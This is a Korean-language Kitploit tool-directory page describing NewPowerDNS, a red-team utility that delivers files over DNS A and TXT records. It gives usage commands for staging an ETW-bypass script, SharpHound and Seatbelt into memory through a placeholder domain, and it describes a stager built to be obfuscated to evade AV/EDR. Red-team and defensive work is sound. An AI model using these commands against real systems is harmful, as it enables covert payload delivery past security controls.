Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
NewPowerDNS — @domchell이 만든 PowerDNS의 업데이트 버전입니다. DNS A 레코드를 통한 전송 지원과 몇 가지 유용한 기능이 추가되었습니다. | Kitploit
도구/GitHubGitHub/icyguider/newpowerdns
Data ExfiltrationCommand and ControlRed TeamingPayload Development
GitHubicyguider/newpowerdns

NewPowerDNS

@domchell이 만든 PowerDNS의 업데이트 버전입니다. DNS A 레코드를 통한 전송 지원과 몇 가지 유용한 기능이 추가되었습니다.

저장소 보기
8593년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

NewPowerDNS

NewPowerDNS는 @domchell's PowerDNS의 업데이트된 버전입니다. 주요 추가 기능은 DNS A 레코드를 사용한 파일 전송 지원입니다. 아래는 적용된 수정 사항의 전체 목록입니다:

  • DNS A 레코드를 통한 전송 지원
  • 파일 전송 크기를 줄이기 위한 Gzip 압축
  • 모든 유형의 파일 전송 지원
  • AV/EDR에 의해 차단되는 것을 피하기 위해 쉽게 난독화하거나 줄 단위로 실행할 수 있는 새로운 스테이저
  • 전송된 파일을 출력, 실행 또는 저장하는 옵션
  • python2에서 python3로 업데이트

python3 외의 유일한 종속성은 scapy입니다. 다음과 같이 pip를 통해 쉽게 설치할 수 있습니다:

root@kitploit:~
python3 -m pip install scapy

DNS A 및 TXT 레코드를 통해 파일을 전송하는 데모 비디오는 아래를 참조하십시오:

예제 및 사용법

PowerShell 스크립트를 DNS A 레코드를 통해 전송하고 콘솔에 출력:

root@kitploit:~
python3 NewPowerDNS.py --file AmSeeETWBP.ps1 --domain sub.domain.com -r A -a print

exe 파일을 DNS TXT 레코드를 통해 전송하고 디스크에 저장:

root@kitploit:~
python3 NewPowerDNS.py --file SharpHound.exe --domain sub.domain.com -r TXT -a save

PowerShell 스크립트를 DNS TXT 레코드를 통해 전송하고 자동으로 메모리에 로드:

root@kitploit:~
python3 NewPowerDNS.py --file Invoke-Seatbelt.ps1 --domain sub.domain.com -r TXT -a exec

일반 사용법:

root@kitploit:~

 ___                        ___  _ _  ___
| . \ ___  _ _ _  ___  _ _ | . \| \ |/ __>
|  _// . \| | | |/ ._>| '_>| | ||   |\__ \
|_|  \___/|__/_/ \___.|_|  |___/|_\_|<___/

DNS A Record & updated stager version by @icyguider
        Original version by @domchell


usage: NewPowerDNS.py [-h] [-f <file>] [-d <domain>] [-a <action>] [-r <record-type>] [-i <interface>]

optional arguments:
  -h, --help            show this help message and exit
  -f <file>, --file <file>
                        file to transfer
  -d <domain>, --domain <domain>
                        domain with auth NS record
  -a <action>, --action <action>
                        action to perform once data is transferred (options: save, exec, print)
  -r <record-type>, --record-type <record-type>
                        type of DNS record to use for transfer (options: A, TXT) (default: TXT)
  -i <interface>, --interface <interface>
                        interface to bind to (default: eth0)
도구 다운로드